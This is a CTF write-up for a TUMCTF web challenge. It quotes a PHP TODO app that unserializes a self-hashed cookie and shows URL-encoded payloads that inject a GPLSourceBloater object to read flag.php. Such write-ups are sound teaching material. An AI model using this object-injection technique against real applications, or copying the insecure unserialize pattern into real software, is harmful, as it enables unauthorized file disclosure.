The 2-day pentest #dientaphcm.vn finished with no highlight. I feel very tired with my brain, so in this TUMCTF, I only try with one challenge in Web Category.
Main: http://104.154.70.126:10888/index.php
The basic post and basic XSS.
but sense imposible to exploit from this bug ^.^ because “hint: flag is in flag.php” and certainly we need to read source code from flag.php.
Something available in this web
http://104.154.70.126:10888/?source
<? // something spam in license.txt ?>
<?php
Class GPLSourceBloater{
public function __toString()
{
return highlight_file(‘license.txt’, true).highlight_file($this->source, true);
}
}
if(isset($_GET[‘source’])){
$s = new GPLSourceBloater();
$s->source = __FILE__;
echo $s;
exit;
}
$todos = [];
if(isset($_COOKIE[‘todos’])){
$c = $_COOKIE[‘todos’];
$h = substr($c, 0, 32);
$m = substr($c, 32);
if(md5($m) === $h){
$todos = unserialize($m);
}
}
if(isset($_POST[‘text’])){
$todo = $_POST[‘text’];
$todos[] = $todo;
$m = serialize($todos);
$h = md5($m);
setcookie(‘todos’, $h.$m);
header(‘Location: ‘.$_SERVER[‘REQUEST_URI’]);
exit;
}
?>
<html>
<head>
<style>
* {font-family: “Comic Sans MS”, cursive, sans-serif}
</style>
</head>
<h1>My open/libre/free/PHP/Linux/systemd/GNU TODO List</h1>
<a href=”?source”><h2>It’s super secure, see for yourself</h2></a>
<ul>
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
</ul>
<form method=”post” href=”.”>
<textarea name=”text”></textarea>
<input type=”submit” value=”store”>
</form>
I try to read source in spite of tired
Something happen in my brain:
what does “<? //something spam in license.txt ?>” use to ? Do this help us read source 😀
so “class GPLSourceBloater ” does !!!
I try with google and found http://php.net/manual/en/language.oop5.magic.php
Magic Methods will auto call if object exist.
The Idea in this case is construct a GPLSourceBloater object.
And Object injection help we do this
after a post I get cookie like setcookie(‘todos’, $md5($m).$m); #m is serialize category.
To understand below payload you must check your mind in serialize function
http://php.net/manual/en/function.serialize.php
To construct a GPLSourceBloater Object, I design cookie like serialize an object
and must have ‘this->source=”flag.php”‘ element.
“todos=dc3d729712b1c4f52083accc39148791O%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D”
but it’s print
yup, it must be an array of object to print this source.
“todos=dd0216616f68a33acd7e3817e02fd4d5a%3A1%3A%7Bi%3A1%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D”
And I get flag
Done!! Good night reader!!
0xD0ff9 